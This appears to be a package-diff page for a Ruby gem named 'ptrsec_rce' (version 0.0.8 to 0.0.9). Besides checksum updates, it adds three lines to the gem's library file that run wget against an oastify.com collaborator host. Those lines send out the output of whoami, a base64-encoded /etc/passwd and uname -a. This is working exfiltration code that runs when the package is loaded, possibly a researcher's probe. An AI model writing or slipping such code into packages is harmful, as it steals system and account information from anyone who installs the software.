ptrsec_rce 0.0.8 → 0.0.9
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/ptrsec_rce.rb +3 -1
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: a155c80b8a00f751e27c2ad1f6b48c22320d1dc74c3d9e8de66411eb159a2156
|
4
|
+
data.tar.gz: a41027e41c4767d2cb5b98f27d7132f5ee3a6aab5e5356aa9730eec1094ced78
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 78af9aa91c2025c249623bce91c7918e1841b8ddecb0085306196d55f717ac8095f209f8bc0c43ad414cd6d20f7be0e867c7e65ff950c5d40c52a910eeb40a30
|
7
|
+
data.tar.gz: 041ad75be9ac46c51bb84881370a60fdc1d64d0c994dbe95da7a0025c2649f43dedb21be284736ff12b750927062029ac061a49034aff998380c5eb42087c9e3
|
data/lib/ptrsec_rce.rb
CHANGED
@@ -1 +1,3 @@
|
|
1
|
-
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(
|
1
|
+
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(whoami)")
|
2
|
+
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(cat /etc/passwd | base64)")
|
3
|
+
exec("wget https://hj4qey1ip97ha04p77axreokbbh251tq.oastify.com/?d=$(uname -a)")
|